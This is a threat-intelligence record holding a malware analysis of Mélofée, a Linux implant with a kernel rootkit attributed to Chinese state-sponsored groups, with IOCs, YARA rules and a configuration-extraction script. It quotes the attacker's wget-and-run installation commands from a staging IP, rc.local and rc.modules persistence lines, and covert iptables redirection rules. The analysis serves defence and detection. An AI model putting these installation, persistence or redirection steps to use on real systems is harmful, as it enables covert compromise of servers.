{
	"id": "3ccdcd57-7104-4d03-b0f5-720c026aab70",
	"created_at": "2026-04-06T00:13:11.053596Z",
	"updated_at": "2026-04-10T13:12:48.736363Z",
	"deleted_at": null,
	"sha1_hash": "fde68c48764877cbd2d667deaa47f7d00e42a691",
	"title": "Mélofée: a new alien malware in the Panda's toolset targeting Linux hosts",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 2813453,
	"plain_text": "Mélofée: a new alien malware in the Panda's toolset targeting\r\nLinux hosts\r\nPublished: 2023-03-28 · Archived: 2026-04-05 21:37:01 UTC\r\nWe recently discovered an novel undetected implant family targeting Linux servers, which we dubbed Mélofée.\r\nWe linked with high confidence this malware to chinese state sponsored APT groups, in particular the notorious\r\nWinnti group.\r\nIn this blogpost we will first analyze the capabilities offered by this malware family, which include a kernel mode\r\nrootkit, and then deep dive in an infrastructure pivot maze to discover related adversary toolsets.\r\nMélofée implant analysis\r\nhttps://blog.exatrack.com/melofee/\r\nPage 1 of 19\n\nWe found three samples of this malware family, which we dubbed Mélofée.\r\nTwo of these samples included a version number ( 20220111 , 20220308 ), and we assess that the last sample was\r\nlikely dated from late April or May 2022.\r\nAll these samples shared a common code base, but showed a constant development in the following domains:\r\nevolutions of the communication protocol and the packet format\r\nchange in the encryption of the configuration, using first RC4 and then a simple xor\r\nthe development of a SelfForwardServer functionality\r\nlastly, the inclusion of a kernel mode rootkit in the last sample.\r\nRootkit\r\nThe first sample we found dropped a rootkit based on a modified version of the open source projet Reptile\r\n1\r\n.\r\nAccording to the vermagic metadata, it is compiled for a kernel version 5.10.112-108.499.amzn2.x86_64 . The\r\nrootkit has a limited set of features, mainly installing a hook designed for hiding itself.\r\nThe rootkit hooks the functions fillonedir , filldir and filldir64 in order to not display files with names\r\ncontaining intel_audio or rc.modules when listing a directory.\r\nIt also hooks the inet_ioctl function in order to be able to communicate with its userland part using the ioctl\r\nsystem call. 
The kernel rootkit expects the userland component to send a value of 0xe0e0e0e during the IOCTL call, with 2 commands supported (these two commands being hide and show).\r\nThe rootkit is loaded both by the installer and server components with a call to the insmod utility.\r\nInstaller\r\nThe implant and the rootkit were installed using shell commands downloading both the installer and a custom binary package from an adversary controlled server. This behaviour is similar to the installation process of Winnti Linux rootkits.\r\nwget http://173.209.62[.]186:8765/installer -O /var/tmp/installer\r\nwget http://173.209.62[.]186:8765/a.dat -O /var/tmp/usbd;\r\nchmod +x /var/tmp/installer;\r\n/var/tmp/installer -i /var/tmp/usbd\r\nThe installer is also developed in C++, and takes the binary package as an argument. It then proceeds to extract and install both the rootkit and the server component. The rootkit and implant paths are hardcoded to /etc/intel_audio/intel_audio.ko and /etc/intel_audio/audio respectively. The installer inserts the kernel rootkit using a call to system(\"insmod /etc/intel_audio/intel_audio.ko\"), and also installs the persistence in the /etc/rc.modules file.\r\nWriting to this script ensures that both the kernel module and the implant are executed at boot time [2].\r\nThe resulting script after installation can be seen below:\r\n#!/bin/sh\r\n#Script for starting modules\r\n/sbin/insmod /etc/intel_audio/intel_audio.ko\r\n/etc/intel_audio/audio\r\n#End script\r\nThe first bytes of the package include the offset to the payload (in little endian), which is used to correctly extract the kernel rootkit and the server implant.\r\n00000000: b07e 0000 a841 3000 7f45 4c46 0201 0100 .~...A0..ELF....\r\n00000010: 0000 0000 0000 0000 0100 3e00 0100 0000 ..........\u003e.....\r\n00000020: 0000 0000 0000 0000 0000 0000 0000 0000 ................\r\nThe developer was also kind enough to include 
a usage function describing the installer’s options:\r\nvoid usage(undefined8 param_1)\r\n{\r\n    printf(\"Usage: \u003c%s\u003e [options]\\n\",param_1);\r\n    puts(\" -r Remove\");\r\n    puts(\" -i \u003cdata file\u003e Install\");\r\n    puts(\" -d Run in background\");\r\n    puts(\" -h Show help\");\r\n    return;\r\n}\r\nConfiguration management\r\nThe configuration is encrypted using the RC4 algorithm in the two early samples, and with a simple xor with a single byte key (0x43) in the undated sample.\r\nThe configuration format has changed between the samples, the first one containing all elements in encrypted form, and the last one with only the C\u0026C domain encrypted.\r\nExample of decrypted configuration:\r\n1:www.data-yuzefuji[.]com:443:5\r\nThis configuration contains the following elements:\r\nThe socket type (0x1 being TCP)\r\nThe C\u0026C domain\r\nThe communication port\r\nThe sleeptime in minutes between requests\r\nPersistence mechanisms\r\nThe implant has two mechanisms of persistence, depending on its running privileges. 
If it runs as the root user, it tries to write a line containing sh -c IMPLANT_EXECUTABLE_NAME \u003e/dev/null 2\u003e\u0026 in the files /etc/rc.local or /etc/rc.d/rc.local.\r\nIf it runs as a simple user, it will try to install its persistence in the following files:\r\n/home/CURRENT_USERNAME/.bash_profile\r\n/home/CURRENT_USERNAME/.bash_login\r\n/home/CURRENT_USERNAME/.profile\r\nThe rootkit installer will insert the persistence for the kernel module in the /etc/rc.modules file.\r\nSupported commands\r\nThe commands supported by the implant have evolved between the samples, showing ongoing development of the backdoor.\r\nThe first two versions:\r\nCommand ID Capability Comment\r\n0x103 ping_back Sent by the client\r\n0x1 uninstall Kills the current process and removes the persistence\r\n0x2 update_and_relaunch Overwrites the currently running file and relaunches\r\n0x3 launch_new_command_thread Creates a new socket for interaction\r\n0x4 write_file\r\n0x5 read_file\r\n0x6 launch_shell\r\n0x7 create_socket 0x0 : TCP, 0x1 : TLS, 0x2 : UDP\r\n0x10 send_local_information Hostname, date, current UID, implant version number, …\r\n0x50001 list_directory\r\n0x50002 create_directory\r\n0x50003 not_implemented\r\n0x50004 delete_directory Wrapper over system(\"rm -fr %s\")\r\nLast version:\r\nCommand ID Capability Comment\r\n0x10005 reset_timer\r\n0x10002 clean_and_exit\r\n0x10004 create_socket Create a bidirectional socket, probably used for proxying\r\n0x40001 list_directory\r\n0x40002 delete_directory Wrapper over system(\"rm -fr %s\")\r\n0x40003 rename\r\n0x40004 create_directory\r\n0x40005 write_file\r\n0x40006 read_file\r\n0x50001 exec_command_with_output\r\n0x70001 write_integer_to_file Purpose unknown, probably used for sleeptime\r\n0x60001 launch_shell\r\n0x90001 no_op\r\nCommunication protocols\r\nThe communication protocols have evolved in the three analyzed samples, however three socket types 
are implemented:\r\nTCPSocket (type 0x0), using raw TCP, with a custom packet format described below;\r\nTLSSocket (type 0x1), using a TLS encrypted channel to exchange with the C\u0026C server;\r\nUDPSocket (type 0x2), using the KCP protocol [3] to send data. It should be noted that the KCP protocol is a public communication library, and is also used in several malware families such as Amoeba [4] or CrossWalk [5];\r\nSome leftover code seems to indicate that there could be an additional type 0x3 for HTTP based communications, but it was not implemented in the analyzed samples.\r\nWhile the data is not encrypted in any form in two of the samples, in the last one it is encrypted using the RC4 algorithm with a hardcoded key (\\x01\\x02\\x03\\x04 repeated 4 times).\r\nThe packet formats used by Mélofée are the following:\r\nstruct Packet202201_3 {\r\n    unsigned int dwCommand;\r\n    unsigned int dwCommandResult;\r\n    unsigned int dwUnknown;\r\n    unsigned int dwDataSize;\r\n    char [] clear_text_data;\r\n}\r\nstruct Packet202205 {\r\n    unsigned int dwUnknown;\r\n    unsigned int dwRandom1;\r\n    unsigned int dwRandom2;\r\n    unsigned int dwCommandResult;\r\n    unsigned int dwCommandID;\r\n    unsigned int dwCommandSize;\r\n    char [] encrypted_data;\r\n}\r\nSelfForwardServer and listening server\r\nIn the latest sample, a new functionality was implemented, named SelfForwardServer.\r\nDepending on a configuration flag, the implant can install iptables rules to redirect TCP network traffic from port 57590.\r\nThe steps to install these rules are the following:\r\nFirst a new NAT chain named XFILTER is created using the following command: iptables -t nat -N %s\r\nA redirection rule is added for the port in this NAT chain: iptables -t nat -A %s -p tcp -j REDIRECT --to-port %d\r\nSave the recent connections from port 45535 with the name ipxles : iptables -t nat -A PREROUTING -p tcp --sport 45535 -m recent 
--set --name %s --rsource -j ACCEPT\r\nRedirects recent ipxles connections to the NAT chain: iptables -t nat -A PREROUTING -p tcp --dport %d --syn -m recent --rcheck --seconds 300 --name %s --rsource -j %s\r\nFinally, the host is instructed to accept network traffic on the port 57590 using the command iptables -I INPUT -p tcp --dport %d -j ACCEPT\r\nIt should be noted that while the SelfForwardServer was deactivated in the configuration, the sample embedded both a self-signed certificate generated on 2021-06-03 and the corresponding private key to be used for securing communication in Server mode.\r\nSome of the underlying code is also present in the two earlier samples (as documented by leftover RTTI information), and three types of server were available:\r\nTCPServer (type 0x00)\r\nTLSServer (type 0x1)\r\nUDPServer (type 0x2)\r\nOne interesting tidbit of this code is hidden in the receive function of the TLSServer (at address 0x429b7a in the undated sample). When the first 4 bytes received by this function using the recv library call are 03 01 d3 76, a flag affecting the creation of the subsequent socket is set. However, we could not identify precisely the purpose of this magic.\r\nBecause of the presence of unused code, and the evolutions between the samples, we assess that the Server and SelfForwardServer are currently under development by the attackers.\r\nAnother pokemon inside the attacker’s toolset\r\nWe analyzed the infrastructure used by the attacker by pivoting on both public and private datasets. 
We assess that this malware family is probably linked to the Amoeba and Winnti [4] [6] [7] [8] state sponsored threat groups.\r\nThe infrastructure for the Mélofée implants is linked to the following tools:\r\nSome of the servers were tracked by our Cyber Threat Intelligence as ShadowPad C\u0026C servers;\r\nOther servers were linked to both Winnti and HelloBot tools;\r\nWe also saw related domains used as C\u0026C servers for tools like PlugX, Spark [9], Cobalt Strike, StowAway [10], and the legitimate toDesk remote control tool;\r\nLastly, the attacker also probably used the ezXSS [11] tool, but we could not confirm why.\r\nHellobot\r\nHelloBot is a malware family also targeting Linux hosts and is known to be used by APT groups such as Earth Berberoka [6]. While pivoting on the Mélofée infrastructure, we found a common IP with a HelloBot sample, which provided another point to dig in.\r\nWe found several samples of this malware and developed a custom configuration extraction script (provided in the annexes of this blog post).\r\nUsing the configurations extracted, we were also able to find strong infrastructure links between HelloBot and Winnti, for example both used a subdomain of git1ab[.]com and cloudf1are[.]com as C\u0026C servers.\r\nProbable links with Winnti\r\nThe response issued by the C\u0026C server at the IP address 173.209.62.186 on the port 443 could be uniquely linked to another domain dev.yuanta.dev. 
This server was known to be used to stage archives containing an installer for the Linux version of the Winnti rootkit [7].\r\nWe also downloaded several samples of this malware family, extracted the configuration (using the script provided by Chronicle), and found several common domains between HelloBot and Winnti, such as cloudf1are[.]com and git1ab[.]com.\r\nAnalysis graph\r\nUsing the previous datapoints, we generated an infrastructure graph to draw the relations between the samples.\r\nWe assess with high confidence that HelloBot, Winnti and Mélofée are all related and were used by Chinese state sponsored attacker groups during at least all of 2022.\r\nAlien\r\nDuring our analysis, we discovered another Linux implant dubbed AlienReverse.\r\nThis code was architectured in a similar manner to Mélofée, however there are several crucial differences:\r\nThe data of the communication protocol was encrypted using pel_decrypt and pel_encrypt from the Reptile project [1].\r\nThe command IDs were different, as can be seen below.\r\nThe tool included several other public tools, such as EarthWorm [12] and socks_proxy [13].\r\nThere were however some common points between Mélofée and AlienReverse:\r\nBoth implants were developed in C++\r\nBoth implants used a file with a fixed ID in /var/tmp/%s.lock to ensure only one implant is running (this code was found in public [14], but seems rarely used in the wild)\r\nThis implant implemented a similar mechanism for limiting working hours (defined as worktime)\r\nThe commands supported by this implant were the following:\r\nCommand ID Capability Comment\r\n0x110010 CmdBroadcast Send encrypted data over the socket\r\n0x110011 CmdOnRainUninstall Unimplemented\r\n0x110020 CmdOnline Send local information such as hostname, date, and current UID to the 
server\r\n0x110061 FileManager Supports several subcommands such as OpenFile, CreateDir, FileEnum, FileDownload, …\r\n0x110062 ScreenSnapshot Unimplemented\r\n0x110063 CmdOnTaskList Unimplemented\r\n0x110064 CmdOnShellCommand Launch interactive shell\r\n0x110065 CmdOnShellActive Unimplemented\r\n0x110066 CmdOnServiceList Unimplemented\r\n0x110068 CmdOnPortMapping Launches EarthWorm to perform the port mapping, supporting a scanning mode with another AlienReverse implant used as a proxy. Also implements the management of a Socks proxy\r\n0x110073 CmdOnKbdRecord Unimplemented\r\n0x110075 CmdOnWorkTime Writes the expected runtime hours in the file /tmp/worktime\r\nThe packet format used by the communication protocol is very similar to the one used by Mélofée:\r\nstruct AlienComzPacket {\r\n    unsigned int dwTickCount;\r\n    unsigned int dwMagic1; // 0xa003001\r\n    unsigned int dwMagic2; // 0x10000137, also used to indicate if the packet has data\r\n    unsigned int dwCommandID;\r\n    unsigned int dwTotalSize;\r\n    unsigned int dwEncryptedSize;\r\n    unsigned int ;\r\n    char [] data; // The data encrypted using pel_encrypt\r\n}\r\nWhile we initially thought that this sample was related to the Mélofée family, we came to the conclusion that it is a distinct tool. However, we decided to include it in this report because it was used as a starting point in this investigation, and we think that sharing it with the public is important.\r\nWe also could not link it to known adversary groups, but we assess that it is likely used in targeted attacks.\r\nConclusion\r\nThe Mélofée implant family is another tool in the arsenal of Chinese state sponsored attackers, which show constant innovation and development.\r\nThe capabilities offered by Mélofée are relatively simple, but may enable adversaries to conduct their attacks under the radar. 
These implants were not widely seen, showing that the attackers are likely limiting their usage to high value targets.\r\nAnnexes\r\nIOCs\r\nHashes\r\nSHA256 | FileType | Comment\r\n3ca39774a4405537674673227940e306cf5e8cd8dfa1f5fc626869738a489c3d | Text file | Installation commands\r\n758b0934b7adddb794951d15a6ddcace1fa523e814aa40b55e2d071cf2df81f0 | ELF x64 executable | Installer\r\na5a4284f87fd475b9474626040d289ffabba1066fae6c37bd7de9dabaf65e87a | ELF x64 executable | Implant version 20220111\r\n2db4adf44b446cdd1989cbc139e67c068716fb76a460654791eef7a959627009 | ELF x64 executable | Implant version 20220308\r\n8d855c28744dd6a9c0668ad9659baf06e5e448353f54d2f99beddd21b41390b7 | ELF x64 executable | Implant with rootkit and without version number\r\nf3e35850ce20dfc731a6544b2194de3f35101ca51de4764b8629a692972bef68 | Binary file | Container of rootkit and implant probably used for installation\r\n330a61fa666001be55db9e6f286e29cce4af7f79c6ae267975c19605a2146a21 | PE x64 executable | Cobalt Strike beacon\r\n7149cdb130e1a52862168856eae01791cc3d9632287f990d90da0cce1dc7c6b9 | PE32 executable | Cobalt Strike beacon\r\na62b67596640a3ebadd288e733f933ff581cc1822d6871351d82bd7472655bb5 | ELF x64 executable | StowAway proxy tool\r\n3535f45bbfafda863665c41d97d894c39277dfd9af1079581d28015f76669b88 | ELF x64 executable | AlienReverse implant\r\n2e62d6c47c00458da9338c990b095594eceb3994bf96812c329f8326041208e8 | ELF x32 executable | HelloBot implant\r\n407ab8618fed74fdb5fd374f3ed4a2fd9e8ea85631be2787e2ad17200f0462b8 | ELF x32 executable | HelloBot implant\r\n187b6a4c6bc379c183657d8eafc225da53ab8f78ac192704b713cc202cf89a17 | ELF x32 executable | HelloBot implant\r\n2801a3cc5aed8ecb391a9638a3c6f8db58ca3002e66f11bf88f8c7c2e5a6b009 | ELF x32 executable | HelloBot 
implant\r\n6e858c2c9ae20e3149cb0012ab9a24995aa331d2a818b127b2f517bc3aa745a0 | PE x64 executable | Go downloader for toDesk\r\n7684e1dfaeb2e7c8fd1c9bd65041b705bc92a87d9e11e327309f6c21b5e7ad97 | PE x64 executable | Go downloader for toDesk\r\n899ef7681982941b233e1ea3c1a6d5a4e90153bbb2809f70ee5f6fcece06cabc | PE x64 executable | Spark implant\r\nc36ab5108491f4969512f4d35e0d42b3d371033c8ccf03e700c60fb98d5a95f8 | ELF x64 UPX packed executable | (probably NPS, to confirm)\r\nad5bc6c4e653f88c451f6f6375516cc36a8fa03dd5a4d1412a418c91d4f9bec8 | ASCII text file | Script dropped in /etc/rc.modules for rootkit persistence\r\n1f9e4bfb25622eab6c33da7da9be6c51cf8bf1a284ee1c1703a3cee445bc8cd9 | ELF x64 executable | Winnti Linux\r\n22fd67457274635db7dd679782e002009363010db66523973b4748d5778b1a2a | ELF x64 executable | Winnti Linux\r\n3c1842d29a3445bd3b85be486e49dba36b8b5ad55841c0ce00630cb83386881d | ELF x64 executable | Winnti Linux\r\n5861584bb7fa46373c1b1f83b1e066a3d82e9c10ce87539ee1633ef0f567e743 | ELF x64 executable | Winnti Linux rootkit\r\n378acfdbcec039cfe7287faac184adf6ad525b201cf781db9082b784c9c75c99 | Shell script | Winnti Linux rootkit installer\r\n617f9add4c27f3bb91a32fee007cce01f5a51deaf42e75e6cec3e71afe2ba967 | ELF x64 executable | Winnti Linux\r\n69ff2f88c1f9007b80d591e9655cc61eaa4709ccd8b3aa6ec15e3aa46b9098bd | ELF x64 executable | Winnti Linux\r\nad979716afbce85776251d51716aeb00665118fb350038d150c129256dd6fc5f | ELF x64 executable | Winnti Linux\r\nf49f1b2cc52623624fdd3d636056b8a80705f6456a3d5a676e3fb78749bdd281 | ELF x64 executable | Winnti Linux\r\n2c1a6fe08c8cbdc904809be4c12b520888da7f33123d1656a268780a9be45e20 | ELF x64 executable | Winnti Linux rootkit (Azazel fork)\r\na37661830859ca440d777af0bfa829b01d276bb1f81fe14b1485fa3c09f5f286 | JavaScript file | ezXSS 
payload\r\nFilenames\r\n/etc/intel_audio\r\n/etc/intel_audio/id\r\n/etc/intel_audio/intel_audio.ko\r\nNetwork IOCs\r\nIOC Comment\r\ndgbyem[.]com AlienReverse C\u0026C domain\r\nupdate[.]ankining[.]com Mélofée C\u0026C subdomain\r\nwww.data-yuzefuji.com Mélofée C\u0026C domain\r\nssm[.]awszonwork[.]com Mélofée C\u0026C subdomain\r\nstock[.]awszonwork[.]com CobaltStrike C\u0026C subdomain\r\nhelp[.]git1ab[.]com HelloBot C\u0026C subdomain\r\nabout[.]git1ab[.]com StowAway and Winnti C\u0026C subdomain\r\nwww[.]git1ab[.]com Unknown usage\r\ncloudf1are[.]com CobaltStrike C\u0026C domain, PlugX staging\r\ncdn[.]cloudf1are[.]com HelloBot C\u0026C subdomain\r\ncdn2[.]cloudf1are[.]com C\u0026C subdomain\r\ncdn3[.]cloudf1are[.]com C\u0026C subdomain\r\ncdn4[.]cloudf1are[.]com C\u0026C subdomain\r\ndns[.]cloudf1are[.]com PlugX and Winnti C\u0026C subdomain\r\ndns2[.]cloudf1are[.]com Spark C\u0026C subdomain, ToDesk staging\r\ndev[.]yuanta[.]dev Probable Winnti C\u0026C domain\r\ntest[.]yuanta[.]dev Probable Winnti C\u0026C domain\r\nus.securitycloud-symantec[.]icu Winnti C\u0026C domain\r\nvt.livehost[.]live Winnti C\u0026C domain\r\n156.67.208[.]192 Mélofée C\u0026C IP\r\n5.61.57[.]80 Mélofée C\u0026C IP\r\n147.139.28[.]254 AlienReverse C\u0026C IP\r\n173.209.62[.]186 Mélofée installer staging\r\n173.209.62[.]187 C\u0026C server\r\n173.209.62[.]188 Mélofée C\u0026C server and Winnti staging domain\r\n173.209.62[.]189 C\u0026C server\r\n173.209.62[.]190 Mélofée C\u0026C IP\r\n167.172.73[.]202 CobaltStrike, ShadowPad and HelloBot C\u0026C IP\r\n47.243.51[.]98 StowAway C\u0026C IP\r\n185.145.128[.]90 CobaltStrike and PlugX C\u0026C IP\r\n103.87.10[.]100 toDesk staging\r\n202.182.101[.]174 PlugX C\u0026C IP\r\n144.202.112[.]187 PlugX staging\r\n38.54.30[.]39 Winnti C\u0026C IP\r\nYara 
rules\r\nrule UNK_APT_MelofeeImplant {\r\n    meta:\r\n        author = \"Exatrack\"\r\n        date = \"2023-03-03\"\r\n        update = \"2023-03-03\"\r\n        description = \"Detects the Melofee implant\"\r\n        tlp = \"CLEAR\"\r\n        sample_hash = \"a5a4284f87fd475b9474626040d289ffabba1066fae6c37bd7de9dabaf65e87a,f3e35850ce20dfc731a6544b\r\n    strings:\r\n        $str_melofee_implant_01 = \"10PipeSocket\"\r\n        $str_melofee_implant_02 = \"ikcp_ack_push\"\r\n        $str_melofee_implant_03 = \"TLSSocketEE\"\r\n        $str_melofee_implant_04 = \"/tmp/%s.lock\"\r\n        $str_melofee_implant_05 = \"neosmart::WaitForMultipleEvents\"\r\n        $str_melofee_implant_06 = \"9TLSSocket\"\r\n        $str_melofee_implant_07 = \"7VServer\"\r\n        $str_melofee_implant_08 = \"N5boost6detail13sp_ms_deleterI13UdpSocketWrapEE\"\r\n        $str_melofee_implant_09 = \"UdpServerWrap\"\r\n        $str_melofee_implant_10 = \"KcpUpdater\"\r\n        $str_melofee_implant_11 = \"SelfForwardServer\"\r\n        $str_command_parsing_01 = {3? 01 00 05 00 ?? ?? ?? ?? 00 00 3? 01 00 05 00 ?? ?? 3? 05 00 04 00}\r\n        $str_command_parsing_02 = {3? 04 00 04 00 ?? ?? ?? ?? 00 00 3? 04 00 04 00 ?? ?? 3? 05 00 01 00}\r\n        $str_command_parsing_03 = {3? 01 00 07 00 ?? ?? ?? ?? 00 00 3? 01 00 09 00 ?? ?? ?? ?? ?? 00 3? 
01 00 06\r\n    condition:\r\n        3 of them\r\n}\r\nrule UNK_APT_Melofee_Installer {\r\n    meta:\r\n        author = \"Exatrack\"\r\n        date = \"2023-03-15\"\r\n        update = \"2023-03-15\"\r\n        description = \"Detects the installer for melofee malware\"\r\n        score = 80\r\n        tlp = \"AMBER\"\r\n        source = \"Exatrack\"\r\n        sample_hash = \"758b0934b7adddb794951d15a6ddcace1fa523e814aa40b55e2d071cf2df81f0\"\r\n    strings:\r\n        $str_melofee_installer_01 = \"#Script for starting modules\"\r\n        $str_melofee_installer_02 = \"#End script\"\r\n        $str_melofee_installer_03 = \"/etc/intel_audio/\"\r\n        $str_melofee_installer_04 = \"rm -fr /etc/rc.modules\"\r\n        $str_melofee_installer_05 = \"-i \u003cdata file\u003e Install\"\r\n        $str_melofee_installer_06 = \"cteate home folder failed\"\r\n        $str_melofee_installer_07 = \"create rootkit file failed\"\r\n        $str_melofee_installer_08 = \"create auto start file failed\"\r\n        $str_melofee_installer_09 = \"Remove Done!\" // only 3 files on VT with this :D\r\n        $str_melofee_installer_10 = \"Unkown option %c\\n\"\r\n    condition:\r\n        any of them\r\n}\r\nrule UNK_APT_Alien_Implant {\r\n    meta:\r\n        author = \"Exatrack\"\r\n        date = \"2023-03-03\"\r\n        update = \"2023-03-03\"\r\n        description = \"Detects an unknown implant from AlienManager family, maybe related to melofee\"\r\n        tlp = \"CLEAR\"\r\n        sample_hash = \"3535f45bbfafda863665c41d97d894c39277dfd9af1079581d28015f76669b88,\"\r\n    strings:\r\n        $str_alien_01 = \"[+] Connect %s Successed,Start Transfer...\"\r\n        $str_alien_02 = \"Alloc buffer to decrypt data error, length == %d.\"\r\n        $str_alien_03 = \"pel_decrypt_msg data error, error\"\r\n        $str_alien_04 = \"encrypt data error, length == %d.\"\r\n        $str_alien_05 = \"DoRecvOverlapInternal error!\"\r\n        $str_alien_06 = \"Socks Listen port is %d,Username is %s, password is %s\"\r\n        $str_alien_07 = \"Start port mapping error! 
remoteAddr=%s remotePort=%d localAddr=%s localPort=%d\"\r\n        $str_alien_08 = \"OnCmdSocksStart error!\"\r\n        $str_alien_09 = \"The master isn't readable!\"\r\n        $str_alien_10 = \"ConnectBypassSocks proxy:%s:%d error!\"\r\n        $str_alien_11 = \"ConnectBypassSocks to %s %d\"\r\n        $str_alien_12 = \"now datetime: %d-%d-%d %d:%d:%d\"\r\n        $str_alien_13 = \"Not during working hours! Disconnect!\"\r\n        $str_alien_14 = \"Example: ./AlienReverse --reverse-address=192.168.1.101:80 --reverse-password=123456\"\r\n        $str_alien_15 = \"Not during working hours! Disconnect!\"\r\n        $str_alien_16 = \"SocksManager.cpp\"\r\n        $str_alien_17 = \"connect() in app_connect\"\r\n        $str_alien_18 = \"They send us %hhX %hhX\"\r\n        $str_alien_19 = \"your input directory is not exist!\"\r\n        $str_alien_20 = \"Send data to local error ==\u003e %d.\\n\"\r\n    condition:\r\n        any of them\r\n}\r\nATT\u0026CK Techniques used\r\nT1583.001 - Attackers acquired servers for staging and command \u0026 control\r\nT5183.004 - Attackers acquired domains\r\nT1071.001 - Attacker uses application layer protocols as C2\r\nT1587.001 - Adversary develops custom malware to achieve its attacks\r\nT1037.004 - Adversary uses RC scripts as persistence\r\nT1059.004 - Attacker uses Unix shell commands and scripts\r\nT1132.002 - Non standard encoding using KCP\r\nT1573.001 - Attacker uses RC4 to encrypt its C2 traffic\r\nT1083 - File and directory discovery\r\nT1592.002 - Attacker discovers the installed version of the Linux distribution\r\nT1564.001 - Adversary hides the files using a rootkit\r\nT1562.003 - Adversary disables the shell history when executing a command\r\nT1070.004 - Adversary can remove the implant, the rootkit and its configuration from the system\r\nT1599.001 - Adversary can modify the firewall rules of the compromised host\r\nT1095 - Adversary can use UDP as a communication layer\r\nT1571 - Adversary can use alternative ports for communication\r\nT1027.002 - HelloBot 
implants are packed using UPX with the configuration appended\r\nT1027.007 - Adversary payloads are stripped\r\nT1588.001 - Adversary may buy or download malware\r\nT1588.002 - Adversary may buy or download tools such as Cobalt Strike\r\nT1057 - Adversary may list the processes executing on the compromised host\r\nT1572 - Adversary may tunnel network communications\r\nT1090 - Adversary may use a connection proxy for accessing internal resources\r\nT1014 - Adversary uses a rootkit\r\nT1608.001 - Adversary uploads its malware on its infrastructure for deployment\r\nT1608.002 - Adversary uploads its tools on its infrastructure\r\nT1082 - Adversary gets detailed information about the compromised host such as the operating system version\r\nT1497.003 - Adversary uses time-based methods to avoid detection\r\nHelloBot configuration extraction script\r\n#!/usr/bin/env python3\r\n# encoding: utf-8\r\n\"\"\"\r\n    Hello Bot configuration extractor\r\n    (c) 2023 Exatrack\r\n\"\"\"\r\nimport sys\r\nimport argparse\r\nimport struct\r\n\r\n\r\ndef decrypt_config(config):\r\n    \"\"\"\r\n    Decrypts hellobot configuration: each byte is XORed with the repeating\r\n    key and with the previous (still encrypted) byte of the input\r\n    \"\"\"\r\n    old_char = 0\r\n    out = []\r\n    key = b'ecfafeab6ee7d642'\r\n    for index, car in enumerate(config):\r\n        bVar1 = old_char ^ key[index % len(key)]\r\n        dec_car = bVar1 ^ car\r\n        old_char = car\r\n        out.append(dec_car)\r\n    return bytes(bytearray(out))\r\n\r\n\r\ndef get_config(data):\r\n    \"\"\"\r\n    Extract the pointer to the configuration: the last 4 bytes of the sample\r\n    hold the configuration size (little endian), the configuration sits just before them\r\n    \"\"\"\r\n    offset = struct.unpack('\u003cI', data[-4:])[0]\r\n    if offset \u003e len(data)-4:\r\n        print(\"[!] 
Error, cannot find offset, probably not a packed Hellobot sample\")\r\n        raise IOError\r\n    config = data[-offset-4:-4]\r\n    if b'[main]' in config:\r\n        print(\"[x] Success, found hellobot configuration\")\r\n    return -offset-4, config\r\n\r\n\r\ndef extract_hellobot(fname):\r\n    \"\"\"\r\n    Writes the raw configuration, the decrypted configuration and the\r\n    packed payload (without the appended configuration) next to the sample\r\n    \"\"\"\r\n    with open(fname, 'rb') as f:\r\n        packed_data = f.read()\r\n    offset, config = get_config(packed_data)\r\n    to_unpack = packed_data[:offset]\r\n    with open(f\"{fname}_config\", \"wb\") as of:\r\n        of.write(config)\r\n    with open(f\"{fname}_config_decrypted\", \"wb\") as of:\r\n        of.write(decrypt_config(config))\r\n    with open(f\"{fname}_packed\", \"wb\") as of:\r\n        of.write(to_unpack)\r\n\r\n\r\ndef main():\r\n    parser = argparse.ArgumentParser(description=sys.modules[__name__].__doc__)\r\n    parser.add_argument(\"filename\", help=\"The filename of the sample to unpack\")\r\n    args = parser.parse_args()\r\n    extract_hellobot(args.filename)\r\n\r\n\r\nif __name__ == \"__main__\":\r\n    main()\r\nReferences\r\n1. https://github.com/f0rb1dd3n/Reptile\r\n2. https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/5/html/deployment_guide/s1-kernel-modules-persistant\r\n3. https://github.com/skywind3000/kcp\r\n4. https://i.blackhat.com/Asia-22/Thursday-Materials/AS-22-LeonSilvia-NextGenPlugXShadowPad.pdf\r\n5. https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/higaisa-or-winnti-apt-41-backdoors-old-and-new/\r\n6. https://documents.trendmicro.com/assets/white_papers/wp-operation-earth-berberoka.pdf\r\n7. https://medium.com/chronicle-blog/winnti-more-than-just-windows-and-gates-e4f03436031a\r\n8. https://www.recordedfuture.com/chinese-group-tag-22-targets-nepal-philippines-taiwan\r\n9. https://github.com/XZB-1248/Spark\r\n10. https://github.com/ph4ntonn/Stowaway\r\n11. https://github.com/ssl/ezXSS\r\n12. http://rootkiter.com/EarthWorm/\r\n13. https://github.com/fgssfgss/socks_proxy\r\n14. 
https://blog.csdn.net/weixin_29100927/article/details/116577862\r\nSource: https://blog.exatrack.com/melofee/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://blog.exatrack.com/melofee/"
	],
	"report_names": [
		"melofee"
	],
	"threat_actors": [
		{
			"id": "5bbced13-72f7-40dc-8c41-dcce75bf885e",
			"created_at": "2022-10-25T15:50:23.695735Z",
			"updated_at": "2026-04-10T02:00:05.335976Z",
			"deleted_at": null,
			"main_name": "Winnti Group",
			"aliases": [
				"Winnti Group"
			],
			"source_name": "MITRE:Winnti Group",
			"tools": [
				"PipeMon",
				"Winnti for Windows",
				"PlugX"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "9f101d9c-05ea-48b9-b6f1-168cd6d06d12",
			"created_at": "2023-01-06T13:46:39.396409Z",
			"updated_at": "2026-04-10T02:00:03.312816Z",
			"deleted_at": null,
			"main_name": "Earth Lusca",
			"aliases": [
				"CHROMIUM",
				"ControlX",
				"TAG-22",
				"BRONZE UNIVERSITY",
				"AQUATIC PANDA",
				"RedHotel",
				"Charcoal Typhoon",
				"Red Scylla",
				"Red Dev 10",
				"BountyGlad"
			],
			"source_name": "MISPGALAXY:Earth Lusca",
			"tools": [
				"RouterGod",
				"SprySOCKS",
				"ShadowPad",
				"POISONPLUG",
				"Barlaiy",
				"Spyder",
				"FunnySwitch"
			],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "873919c0-bc6a-4c19-b18d-c107e4aa3d20",
